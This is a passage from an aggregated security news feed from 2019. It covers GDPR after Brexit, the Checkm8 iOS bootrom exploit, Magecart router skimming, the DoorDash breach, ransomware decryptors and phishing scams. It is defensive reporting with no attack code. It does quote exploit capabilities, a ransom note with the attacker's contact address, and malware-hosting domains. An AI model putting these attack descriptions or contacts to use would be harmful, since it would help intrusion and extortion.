To be proactive about it, you can designate a DPO (Data Protection Officer) in each country you have offices in, and that should cover the conditions imposed by the EU on third countries (which the UK will effectively become).

This will solve compliance issues, but be warned that handling GDPR after Brexit in paperwork terms might not be the worst of it. Because of the extra hassle involved, it’s very likely that obtaining more clients in the EU market will be difficult. It will be harder to compete with EU controllers who don’t have post-Brexit ambiguity to sort through.

#4. Scenario 4

After May 2018, all processors in the UK who were working with EU organizations were required to have them sign contracts which stipulated how their data would be handled. The issue here is that those contracts and agreements mentioned the UK as an EU country, which will no longer be true.

This means that all this paperwork will need to be redone. It’s best if you are proactive and start sending out the revised forms as soon as the Brexit decision is concluded one way or another.

There is the risk that some of your business partners will decline to re-sign, but you do the best with what you have and move on. Continuing to do business with them in the absence of flawless paperwork is too great a risk to take.

#5. Scenario 5

For processors in the UK working only with data of people within the UK (and for controllers in the UK), the same applies as in Scenario 1. In other words, nothing changes, there is no extra concern to be had.

Cybersecurity Risks of GDPR after Brexit: A Few Words of Caution

As you can see by now, GDPR after Brexit will bring a lot of paperwork in many cases. Not just paperwork, but also a lot of communications going on with partners across national frontiers.

Since these communications will be out of the ordinary, and since the Brexit situation is new to everyone, this can be a huge opportunity for cybercriminals.

Be wary of any email you receive about Brexit and GDPR matters, especially if the sender is prompting you to do something involving vulnerable data. Don’t enter your login details on any page (could be a phishing attempt), don’t engage in conversations with people you don’t really know from before, etc.

Business Email Compromise (BEC) is a growing and costly threat. The little chaos which will likely flood everyone’s emails concerning GDPR after Brexit is the perfect opportunity for BEC attacks.

Spam filters are not enough to tackle it – you need to do some thorough background checks with every email and to also have an email security solution specially designed to counter BEC attacks.

Wrapping it up

I hope this guide helped clear the confusion surrounding GDPR after Brexit. In any case and however convoluted the Brexit process will continue to be, you should take some steps to prepare for the future.

Just look up your own business situation in the scenarios above and find out what you can expect even if we end up with a no-deal Brexit. Good luck and drop us a line with any concern you might have.

The post GDPR after Brexit: No Deal and All Other Exit Scenarios Explained appeared first on Heimdal Security Blog.

Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips

A security expert has released a new jailbreak, dubbed Checkm8, that impacts all iOS devices running on A5 to A11 chipsets; it works on iPhone models from the 4S to the 8 and X.

The security expert Axi0mX has released a new jailbreak, dubbed Checkm8, that works on all iOS devices running on A5 to A11 chipsets. The jailbreak works with all Apple products released between 2011 and 2017, including iPhone models from 4S to 8 and X.

Checkm8 leverages vulnerabilities in the Apple Bootrom (secure boot ROM) to achieve full control over the device.

“The bootrom (called “SecureROM” by Apple) is the first significant code that runs on an iDevice. The bootrom is read-only. Finding exploits in the bootrom level is a big achievement since Apple won’t be able to fix it without a hardware revision.” reads a description of the bootrom.

The expert who devised Checkm8 described it as “a permanent unpatchable bootrom exploit,” although it is essential to highlight that the exploit only leads to a jailbreak when chained with other flaws.

Bootrom exploits are very dangerous because they are permanent and can’t be addressed via software; patching a bootrom flaw requires physically revising the chipset.

Axi0mX’s exploit code is marked as a “beta” release, but there is the concrete possibility that expert coders or intelligence agencies will integrate it into hacking tools and malware.

“What I am releasing today is not a full jailbreak with Cydia, just an exploit. Researchers and developers can use it to dump SecureROM, decrypt keybags with AES engine, and demote the device to enable JTAG. You still need additional hardware and software to use JTAG.” wrote the expert.

“Features the exploit allow include:

  • Jailbreak and downgrade iPhone 3GS (new bootrom) with alloc8 untethered bootrom exploit. 🙂
  • Pwned DFU Mode with steaks4uce exploit for S5L8720 devices.
  • Pwned DFU Mode with limera1n exploit for S5L8920/S5L8922 devices.
  • Pwned DFU Mode with SHAtter exploit for S5L8930 devices.
  • Dump SecureROM on S5L8920/S5L8922/S5L8930 devices.
  • Dump NOR on S5L8920 devices.
  • Flash NOR on S5L8920 devices.
  • Encrypt or decrypt hex data on a connected device in pwned DFU Mode using its GID or UID key.”

Currently, the jailbreak does not work on Apple’s two latest chipsets, the A12 and A13.

Experts pointed out that the jailbreak needs physical access to the device, and so cannot be used remotely.

“During iOS 12 betas in summer 2018, Apple patched a critical use-after-free vulnerability in iBoot USB code. This vulnerability can only be triggered over USB and requires physical access. It cannot be exploited remotely. I am sure many researchers have seen that patch.” concludes the expert.

“That’s how I discovered it. It is likely at least a couple other researchers were able to exploit this vulnerability after discovering the patch. The patch is easy to find, but the vulnerability is not trivial to exploit on most devices.”

Pierluigi Paganini

(SecurityAffairs – Checkm8, hacking)

The post Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips appeared first on Security Affairs.

Threat Roundup for September 20 to September 27

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 20 and Sep. 27. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU272019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Divergent Malware Using NodeJS, WinDivert in Fileless Attacks

Samples of a new malware family called “Divergent” are using both NodeJS and WinDivert in a series of fileless attack campaigns. Cisco Talos didn’t identify the exact delivery method for Divergent. Even so, its researchers observed that the samples they analyzed staged and stored configuration data in the registry like other fileless malware. They also […]… Read More

The post Divergent Malware Using NodeJS, WinDivert in Fileless Attacks appeared first on The State of Security.

Hacker Releases ‘Unpatchable’ Jailbreak For All iOS Devices, iPhone 4s to iPhone X

An iOS hacker and cybersecurity researcher today publicly released what he claimed to be a "permanent unpatchable bootrom exploit," in other words, an epic jailbreak that works on all iOS devices ranging from iPhone 4s (A5 chip) to iPhone 8 and iPhone X (A11 chip). Dubbed Checkm8, the exploit leverages unpatchable security weaknesses in Apple's Bootrom (SecureROM), the first significant code

This Week in Security News: Fake Apps on iOS and Google Play and Social Media Security Issues

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the evolution of EDR to XDR (and why your CISO should care), stock trading app attacks and fake gambling apps. Also, read about how Instagram and the Heyyo dating app exposed their users’ data.

Read on:

Why Should CISOs Care About XDR?

Will the evolution of EDR to XDR meet the challenges we are seeing today? In Trend Micro’s latest Simply Security blog, learn how XDR fills the gaps that EDR can’t, including malicious artifacts that are siloed or missed at the network, cloud and gateway – and why your CISO should care.

Mac Malware that Spoofs Trading App Steals User Information, Uploads it to Website

As the use of stock trading apps continues to rise and gain popularity, cybercriminals continue to create and leverage fake trading apps to steal users’ personal data. Trend Micro found and analyzed a fake stock trading app, which had a malicious malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.

Instagram Data Leak Exposes Account Information Including Full Names and Phone Numbers

Another day, another security issue for the Facebook family of companies. This time out, an Instagram data leak was discovered, exposing hidden contact information including the real names of millions of Instagram users and their phone numbers.

Gambling Apps Sneak into Top 100: How Hundreds of Fake Apps Spread on iOS App Store and Google Play

Trend Micro found hundreds of fake apps on iOS and Google Play stores, many of which posed as seemingly normal gambling games and were controlled to appear innocuous. Leveraging a “switch” feature, threat actors set the apps to either show or hide the app’s actual content.

Chrome Bug, Not Avid Software, Causes Damage to MacOS File Systems

Researchers have tracked a problem that caused corruption to the file systems of macOS users to a bug in a Google Chrome update after users originally feared it was a problem with Avid Media Composer. Users scrambled to find a fix for the problem, and eventually Google took responsibility for the issue.

From Homes to the Office: Revisiting Network Security in the Age of the IoT

As more businesses take advantage of rapidly developing IoT (Internet of Things) technology and begin adoption for their network environments, the underlying concern for network and data security has grown. In this blog, read about the commonly used features and types of home devices currently on the market, their security risks and Trend Micro’s best practices to defend and mitigate against attacks.

Magecart Web Skimming Group Targets Public Hotspots and Mobile Users

One of the web skimming groups that operate under the Magecart umbrella has been testing the injection of payment card stealing code into websites through commercial routers like those used in hotels and airports. The group has also targeted an open-source JavaScript library called Swiper that is used by mobile websites and apps.

Unsecure Pagers in Vancouver Expose Sensitive Patient Data: What This Means for Enterprises

The nonprofit group Open Privacy Research Society publicized in a press release that the confidential medical and personally identifiable information (PII) of patients across Vancouver, Canada, is being leaked through the paging systems of hospitals in the area. In this article, Trend Micro analyzes the security risks of pager technology.

Microsoft Releases Out-of-Band IE, Defender Security Updates

Microsoft released two out-of-band security patches to address critical issues for Internet Explorer (IE) and Microsoft Defender. While no exploit has been reported, Microsoft stated that an IE zero-day scripting engine flaw has been observed in the wild and advised users to manually update their systems immediately.

Heyyo Dating App Leaked Users’ Personal Data, Photos, Location, More

Online dating app Heyyo has made the same mistake that thousands of companies have made before it — namely, it left a server exposed on the internet without a password. This leaky server, an Elasticsearch instance, exposed the personal details, images, location data, phone numbers, and dating preferences for nearly 72,000 users, which is believed to be the app’s entire userbase.

Emotet Disguises as Downloadable File of Edward Snowden’s New Book to Infect Users

Emotet malware expanded its campaign to bank on the popularity of former CIA contractor and NSA whistleblower Edward Snowden’s bestselling memoir. The cybercriminals behind the campaign sent spam emails containing a Microsoft Word document pretending to be a free “Permanent Record” copy, luring victims to open the malicious document containing Emotet.

Social Engineering Explained: How Criminals Exploit Human Behavior

Social engineering has proven to be a successful way for criminals to get inside your organization using the art of exploiting human psychology, rather than technical hacking techniques. This article breaks down various social engineering techniques and discusses five ways to defend your organization against social engineering.

Are you surprised that fake gambling apps are making it past Apple and Google Play app store reviews? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Fake Apps on iOS and Google Play and Social Media Security Issues appeared first on .

Magecart 5 hacker group targets L7 Routers

IBM researchers observed one of the Magecart groups using malicious code designed for injection into commercial-grade layer 7 (L7) routers.

IBM X-Force Incident Response and Intelligence Services (IRIS) experts observed that one of the Magecart groups, tracked as MG5, is using malware designed for injection into commercial-grade L7 routers.

The experts believe the hackers are likely testing malicious code designed for injection into benign JavaScript files loaded by L7 routers that are typically used by airports, casinos, hotels, and resorts. According to IBM, the threat actors are currently targeting users shopping on U.S. and Chinese websites.

The experts discovered that the Magecart hackers are able to inject a credit card skimmer into a popular open-source JavaScript library that websites use to ensure wide compatibility with mobile browsing.

“We found that MG5 has likely devised an attack scenario in which it could inject its malicious payment card stealing code into a popular open-source JavaScript library. This open-source code is provided as a free, licensed tool designed to help make websites compatible with mobile browsing.” reads the analysis published by IBM. “By infecting that code, MG5 can potentially infect and compromise the data of mobile device users that install booby-trapped apps and then shop online.”

The experts speculate that the attackers have prepared code for injection into a specific type of commercial-class L7 router, but they pointed out that no vendor compromise has been observed so far.

L7 routers implement both routing and switching capabilities; an attacker who compromises such a network device could perform several malicious activities, such as traffic hijacking.

The router may be installed on the same virtualization server as other business-critical IT infrastructure components, which means that once compromised it could be used by hackers for lateral movement.

Wi-Fi connectivity is usually offered for free in locations such as hotels, which prefer to outsource the Wi-Fi service; most Wi-Fi service vendors, however, do not support proxying adverts or JavaScript injection.

“Having access to a large number of captive users with very high turnover — such as in the case of airports and hotels — is a lucrative concept for attackers looking to compromise payment data.” continues IBM. “We believe that MG5 aims to find and infect L7 router libraries with malicious code and possibly inject malicious ads that captive users must click on to eventually connect to the internet.”

Attackers who compromise L7 routers can steal payment data from guests who browse websites through the compromised network device; they can also inject malicious ads into webpages viewed by all connected guest devices.

IBM experts also believe that the Magecart hackers have infected open-source mobile app code that’s offered to app developers for free.

“Another finding from X-Force IRIS with regards to code being tested by Magecart Group 5 concerns open-source mobile app code that’s offered to app developers for free. The code provides a library-agnostic touch slider to allow developers to build touch galleries for their app projects.” concludes the report.

“MG5 has likely infected this code, corrupting it as its source to ensure that every developer using the slider will end up serving the attackers’ malicious code, leading to the compromise of data belonging to those using the finished product.”

The report also includes mitigation tips to prevent access to data.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Magecart 5 hacker group targets L7 Routers appeared first on Security Affairs.

Microsoft Warns of a New Rare Fileless Malware Hijacking Windows Computers

Watch out Windows users! There's a new strain of malware making rounds on the Internet that has already infected thousands of computers worldwide and most likely, your antivirus program would not be able to detect it. Why? That's because, first, it's an advanced fileless malware and second, it leverages only legitimate built-in system utilities and third-party tools to extend its

Cyber News Rundown: Instagram Phishing Campaign

Reading Time: ~ 2 min.

Copyright Phishing Campaign Hits Instagram

Many Instagram accounts were recently compromised after receiving a notice that their accounts would be suspended for copyright infringement if they didn’t complete an objection form within 24 hours. By setting a deadline, the attackers hope that flustered victims will quickly enter their account credentials into a phony landing page, after which they are redirected to the authentic Instagram login page to make the process appear legitimate.

WordPress Plugin Exploited

Rich Reviews, a vulnerable WordPress plugin that was removed from the main WordPress repository more than six months ago, has been found still active on thousands of websites. This vulnerability allows attackers to download malicious payloads, then redirect victims to phony websites that could further infect their systems. Fortunately, several security companies are working with the plugin’s creators to fix the current vulnerabilities, though these updates won’t reach users until it’s put back on the repository.

Banking Malware Campaign

Hundreds of malware samples have been discovered that target ATMs and can be deployed to obtain sensitive banking information from infected systems. Dtrack, as the malware toolset is called, can also be used to steal local machine information, such as keystrokes and browser history, by using known vulnerabilities in network security. This type of attack comes from the Lazarus Group, who have been known to target nations and major financial institutions around the world.

Click2Gov Site Hacked

An online bill paying site used in dozens of cities across the U.S. was recently hacked in at least eight cities, already compromising more than 20,000 individuals from all 50 states. This will be the third breach affecting Click2Gov, all of which used an exploit allowing attackers to gain both remote access to the system and upload any files they choose. Many of the cities that were targeted recently were part of the prior attacks on the Click2Gov portal.

Wyoming Healthcare Hit with Ransomware

Campbell County Health’s computer systems were brought to a halt after suffering a ransomware attack this week. Nearly 1,500 computers were affected and all currently scheduled surgeries and other medical care must be delayed or diverted to another facility. Fortunately, CCH is working quickly to restore all of their systems to normal and determine the exact infection point for the attack.

The post Cyber News Rundown: Instagram Phishing Campaign appeared first on Webroot Blog.

Global Consumers Reject Government-Mandated Encryption Backdoors

Global consumers overwhelmingly reject government arguments that encryption backdoors will make them safer from terrorists, according to new research from Venafi.

The security vendor polled over 4100 consumers in the US, UK, France and Germany to better understand their attitudes to government and social media when it comes to data protection.

Law enforcers and governments on both sides of the Atlantic have consistently argued that encrypted services and devices provide a safe space for terrorists and criminals to operate.

In July, US attorney general, William Barr, added his voice to the calls for government-mandated backdoor access to such data in specific circumstances, saying it “can and must be done.”

However, 64% of respondents told Venafi that they don’t believe government access to private data would make society any safer from terrorists. In fact, just 30% said they thought governments can be trusted to protect their personal data, falling to 24% in the US and climbing slightly (to 40%) in the UK.

“Many politicians and law enforcement officials wish to use surveillance tools and backdoors that most consumers associate with authoritarian regimes, not democracies,” argued Venafi VP of security strategy and threat intelligence, Kevin Bocek.

“If we can’t trust governments to protect sensitive personal data, it’s difficult to imagine how they will be able to regulate the private sector effectively.”

The poll’s respondents are joined by IT security professionals and cryptography experts in their views on mandated backdoors.

Nearly three-quarters (73%) of IT security pros told Venafi in March that laws effectively forcing tech companies to insert backdoors in their products would make their nation less secure.

As if that weren’t enough, a group of world-leading cryptography experts last year backed senator Ron Wyden’s demands that the FBI explain the technical basis for its claim that backdoors can be engineered without impacting user security. The Bureau has so far chosen not to respond.

The Venafi poll also revealed that, perhaps unsurprisingly, just 22% of consumers believe social media companies can be trusted to protect their personal and private data.

Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft has released a new free decryption tool for the Avest ransomware; a few days ago its researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below is the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on infected systems:

“Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

The decryption tool should be used only after the victims have successfully removed the malware from their system, to prevent Avest from locking the machine again or re-encrypting files.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

The post Emsisoft released a new free decryption tool for the Avest ransomware appeared first on Security Affairs.

Banks Add to Confusion as Scammers Target Thomas Cook Customers

Experts are urging Thomas Cook customers not to respond to unsolicited messages in the wake of the UK travel company’s bankruptcy, as scammers are trying to harvest their bank details.

The 178-year-old firm collapsed on Monday, leaving a £3bn black hole in its balance sheet and 150,000 holidaymakers stranded abroad.

However, as with any high-profile incident, scammers have been jumping on the news to try to part consumers from their cash.

Reports soon emerged of customers being cold-called by individuals claiming to work for a ‘refund agent’ for the company and requesting their bank or card details in order to reimburse them.

Adding to the confusion, UK banks have been sending unsolicited text messages about the bankruptcy to customers, some of which contain links and a phone number.

According to tweets cited by consumer rights group Which?, some of the messages were sent to individuals who hadn’t even booked holidays with Thomas Cook, adding to the sense that they may be a scam.

“We’ve heard worrying stories of criminals trying to scam people affected by the collapse of Thomas Cook, so while the messages being sent by some banks might be well-meaning, this flawed approach will only be adding to the confusion customers are facing,” said Which? consumer rights expert, Adam French.

“Our advice is to ignore unsolicited calls and texts, and avoid sharing your card or bank details. Anyone looking to claim back the cost of their flight through their debit or credit card provider should contact their bank directly themselves.”

In the wake of the travel agent’s collapse, Action Fraud urged consumers to be vigilant about potential scams and to not click on links in unexpected messages.

“Legitimate organizations will never contact you out of the blue and ask for your PIN, card details, or full banking passwords. If you get a call or message asking for these, it’s a scam,” the UK’s national fraud reporting center added.

“Remember, your bank or the police will never ask you to transfer money out of your account, or ask you to hand over cash for safe-keeping.”

DoorDash Breach Exposes 4.9 Million Users’ Personal Data

Do you use DoorDash frequently to order your food online? If yes, you are highly recommended to change your account password right now immediately. DoorDash—the popular on-demand food-delivery service—today confirmed a massive data breach that affects almost 5 million people using its platform, including its customers, delivery workers, and merchants as well. DoorDash is a San

DoorDash Breach Exposes Data on Nearly Five Million Users

US food delivery service DoorDash is in the process of notifying its customers after discovering a data breach affecting millions of consumers.

The firm claimed in a notice published yesterday that an unauthorized party managed to access data on 4.9 million customers.

“Earlier this month, we became aware of unusual activity involving a third-party service provider,” it said. “We immediately launched an investigation and outside security experts were engaged to assess what occurred. We were subsequently able to determine that an unauthorized third party accessed some DoorDash user data on May 4, 2019.”

Users who registered with the platform on or before April 5, 2018 are said to be affected. Email addresses, delivery addresses, order history, phone numbers and salted and hashed passwords were stolen, as well as the last four digits of some users’ payment cards.

The last four digits of bank account numbers belonging to some of the firm’s restaurant clients and delivery drivers were also taken, along with the driver’s license numbers of 100,000 delivery staff.

Despite salting and hashing passwords, the firm is advising users to reset their credentials for the site.

Experts were quick to criticize the firm: despite its efforts to encrypt passwords, the stolen data could be used in follow-on attacks, argued Lucy Security CEO, Colin Bastable.

“In the race to grab market share, businesses like DoorDash place security too far down the list,” he argued. “Outsourcing data in-sources cyber-insecurity, and consumers pay the price of a carelessly clicked email phishing link or a targeted spear-phishing attack.”

DoorDash is no stranger to security incidents. Back in September 2018 it claimed that reports from multiple users of their accounts being hacked were down to credential stuffing.

In response to that incident, it blocked the suspect IP address trying to take over accounts, integrated with the HaveIBeenPwned? breach notification site, and rolled out two-factor authentication.

DoorDash Data Breach exposes data of approximately 5 million users

DoorDash, a San Francisco–based on-demand food delivery service, has confirmed that it suffered a data breach that exposed the data of roughly 5 million users.

DoorDash announced a data breach that exposed the personal information of 4.9 million consumers, Dashers, and merchants.

According to the data breach notification sent to the impacted customers and the security notice published on the website, the incident took place on May 4, 2019, when an unauthorized party was able to gain access to user information. Users and merchants who registered on the platform after April 5, 2018, were not impacted.

“Earlier this month, we became aware of unusual activity involving a third-party service provider. We immediately launched an investigation and outside security experts were engaged to assess what occurred. We were subsequently able to determine that an unauthorized third party accessed some DoorDash user data on May 4, 2019.” reads the security notice published on the website. “Approximately 4.9 million consumers, Dashers, and merchants who joined our platform on or before April 5, 2018, are affected. Users who joined after April 5, 2018 are not affected.”

It is not clear how this data was accessed, but the company mentions that it noticed unusual activity involving a third-party service. It is not known whether this data was being hosted by the third-party service provider, whether DoorDash was subject to a supply-chain attack through this provider, or whether the unauthorized access originated from the provider.

Exposed data includes profile information, email addresses, delivery addresses, order history, phone numbers, and hashed and salted passwords. The company also confirmed that for some consumers, Dashers, and merchants, the last four digits of their credit cards or bank accounts were exposed.

“However, full credit card information such as full payment card numbers or a CVV was not accessed. The information accessed is not sufficient to make fraudulent charges on your payment card.” highlighted the company.

The incident also resulted in the exposure of roughly 100,000 driver’s license numbers associated with Dashers.

The company added that it doesn’t believe user passwords have been compromised, but as a precautionary measure it recommends that users reset their passwords. Users can change their DoorDash password by visiting https://www.doordash.com/accounts/password/reset/.

At the time of writing it is not clear how the data was accessed; the company only mentioned unusual activity involving a third-party service provider. It is not clear whether hackers breached the provider to access DoorDash systems or whether DoorDash data was managed by this partner.

Pierluigi Paganini

(SecurityAffairs – DoorDash, hacking)

The post DoorDash Data Breach exposes data of approximately 5 million users appeared first on Security Affairs.

Nearly 5 million DoorDash users, drivers and dealers had personal information exposed

Driver’s license numbers of around 100,000 ‘Dashers’ were also accessed.

DoorDash revealed in a blog post on Thursday that an unauthorized third party had accessed information on 4.9 million customers.

Customers, drivers and dealers who joined the DoorDash platform on or before 5 April 2018 were affected by the breach on 4 May 2019. The firm said that users who joined after 5 April 2018 were not impacted.

It took five months for DoorDash to become aware of the unauthorized activity. The food delivery company said it became aware of suspicious activity involving a third-party service provider earlier this month.

The data affected involves profile details such as names, e-mail addresses, delivery addresses, order history, telephone numbers and hashed passwords, which, DoorDash says, means the real passwords cannot be deciphered by third parties.

The last four digits of client payment cards may also have been exposed. However, DoorDash has stated that full credit card data such as full card numbers or a CVV was not accessed.

Some drivers or merchants may also have the last four digits of the bank account numbers exposed, but complete bank account data was not accessed.

DoorDash said the data accessed was not sufficient to make fraudulent purchases or withdrawals from bank accounts.

The driver’s license numbers of roughly 100,000 drivers were also accessed.

Since the breach was discovered, DoorDash has taken measures to prevent unauthorized access to customer data and improve security on the platform. These measures include adding extra protective layers around the data, enhancing security protocols and recruiting external professionals to detect and block threats.

It has also reached out to the people impacted.

The firm added that while passwords were not considered compromised, it encourages customers to reset them as a precautionary measure.

“We deeply regret the frustration and inconvenience that this may cause you. Every member of the DoorDash community is important to us, and we want to assure you that we value your security and privacy,” DoorDash wrote.

Last month, DoorDash bought one of its competitors, Caviar, for $410 million in a combination of cash and DoorDash preferred stock.

The post Nearly 5 million DoorDash users, drivers and dealers had personal information exposed appeared first on .

How to start achieving visibility in the cloud

As a security executive, you have a curious gig. On one hand, you’re responsible for securing your organization across multiple systems, networks, clouds, and geographies. On the other, your team owns none of those things. Organizing resources in a way that makes visibility possible beyond the data center (assuming you have that to begin with) is hard. That’s because the way you achieve visibility in the cloud, or at the edge, is fundamentally different than … More

The post How to start achieving visibility in the cloud appeared first on Help Net Security.

Should the National Security Council restore the cybersecurity coordinator role?

Former national security advisor John Bolton’s elimination of the cybersecurity coordinator role in May 2018 came as a surprise to many in the cybersecurity industry, especially security professionals that are tasked with securing federal networks, protecting critical infrastructure and providing cybersecurity governance. The role was created to help orchestrate and integrate the government’s cyber policies, make sure federal agencies have adequate cybersecurity funding and coordinate responses to major cybersecurity incidents. Many believe that the abolishment … More

The post Should the National Security Council restore the cybersecurity coordinator role? appeared first on Help Net Security.

Year-over-year malware volume increased by 64%

The most common domains attackers use to host malware and launch phishing attacks include several subdomains of legitimate sites and Content Delivery Networks (CDNs) such as CloudFlare.net, CloudFront.net (which belongs to Amazon), SharePoint and Amazonaws.com, along with legitimate file-sharing websites like my[.]mixtape[.]moe, according to WatchGuard. The report for Q2 2019 also highlights that modules from the popular Kali Linux penetration testing tool made the top ten malware list for the first time. Trojan.GenericKD, which covers … More

The post Year-over-year malware volume increased by 64% appeared first on Help Net Security.

Email and Emotions

Never send an email when you are angry; you will most likely regret it later. Instead, when you are emotional and want to reply to someone, open up an email and write everything you feel, but do not send it. (Be sure there is no name in the TO field so that you do not accidentally send it.) After you have vented, save the email and come back an hour later. You only want to reply to any type of emotional situation after you have had time to cool down.

Podcast: Potential problems with the software supply chain for industrial sites

Industrial security pioneer Eric Byres, CEO of aDolus, speaks to software supply chain trust issues and some of the technology his new venture aDolus Inc. is developing to help. In this podcast Andrew Ginter talks to Eric Byres, about potential problems with the software supply chain for industrial sites. They ask how users can trust the firmware and software that they load into their industrial control systems.

The post Podcast: Potential problems with the software supply chain for industrial sites appeared first on Help Net Security.

Why Cybersecurity Pros Need to Be Good Storytellers

Like storytelling, data visualization can be used to provide a narrative about your organization’s cybersecurity posture. Cybersecurity is never a single thing; it is an amalgamation of an often growing list of issues that never seem to end. So in order to make some sense of what it means for the health of your organization, […]… Read More

The post Why Cybersecurity Pros Need to Be Good Storytellers appeared first on The State of Security.

LookingGlass Cyber Solutions unveils software-defined intrusion detection and prevention system

LookingGlass Cyber Solutions, a leader in intelligence-driven risk management, announced the general availability of the LookingGlass Aeonik Security Fabric, a comprehensive, software-defined security architecture, purpose-built to meet the demands of today’s increasingly borderless and elastic network environments. A fundamentally new approach to cybersecurity, Aeonik is a next-generation intrusion detection and prevention system (IDPS) that illuminates all areas of the network to quickly identify, hunt, disrupt, and respond to adversary activities at the moment and point … More

The post LookingGlass Cyber Solutions unveils software-defined intrusion detection and prevention system appeared first on Help Net Security.

Kali Linux best operating system for beginner & professional pentesters

Kali Linux is the best operating system for beginner & professional pen-testers! Kali Linux is an operating system based on Debian that is developed and maintained by Offensive Security and was designed for penetration testing and digital forensics. Kali Linux was ...

The post Kali Linux best operating system for beginner & professional pentesters appeared first on HackingVision.

Hyundai Mobis develops new safety technology that enhances automotive safety devices

Hyundai Mobis announced that it has developed a “Safety Integrated Control Module” which increases the efficiency and safety of automotive safety devices. The new design combines two previously separate ECUs (electronic control units), one for airbags and one for electronic seatbelts, into a single unit. It also receives real-time data from advanced radar sensors, enabling enhanced protection of passengers in different driving situations. In addition, Hyundai Mobis is also finalizing technology for optimally deploying safety devices such as airbags and electronic … More

The post Hyundai Mobis develops new safety technology that enhances automotive safety devices appeared first on Help Net Security.

BullGuard’s 2020 security suite features new Secure Browser and advanced ML capabilities

Multi-award winning consumer cybersecurity company, BullGuard, announced its new 2020 suite of antimalware solutions featuring BullGuard’s new Secure Browser and advanced Machine Learning capabilities. BullGuard’s new 2020 security suite empowers consumers to confidently perform sensitive online transactions in absolute safety and rest assured knowing cyber threats are stopped dead in their tracks. Additionally, the BullGuard 2020 product suite now enables direct integration with BullGuard VPN to ensure users’ total privacy when connecting to unsecured Wi-Fi. … More

The post BullGuard’s 2020 security suite features new Secure Browser and advanced ML capabilities appeared first on Help Net Security.

Emerson and Cisco introduce a new industrial wireless networking solution

Emerson is partnering with Cisco to introduce a next-generation industrial wireless networking solution that fundamentally transforms data management to improve plant productivity, reliability and safety. The new Emerson Wireless 1410S Gateway with the Cisco Catalyst IW6300 Heavy Duty Series Access Point combines the latest in wireless technology with advanced WirelessHART® sensor technology, delivering reliable and highly secure data, even in the harshest industrial environments. To help enable new digital transformation strategies, this industrial networking solution … More

The post Emerson and Cisco introduce a new industrial wireless networking solution appeared first on Help Net Security.

Hypercore Networks and CloudGenix bring cloud-scale economics to the enterprise remote office

Hypercore Networks, global provider of managed WAN, Voice, Security and Monitoring Solutions, announced a managed service provider (MSP) partnership with CloudGenix, the category leader in enterprise SD-WAN. The companies will offer enterprise companies access to modern, cloud-based, branch infrastructure solutions. Fortune 1000 companies, including those in healthcare, retail, manufacturing, finance, banking, hi-tech and hospitality rely on CloudGenix for their remote office WAN needs. Through this partnership, Hypercore Networks will now be able to offer customers … More

The post Hypercore Networks and CloudGenix bring cloud-scale economics to the enterprise remote office appeared first on Help Net Security.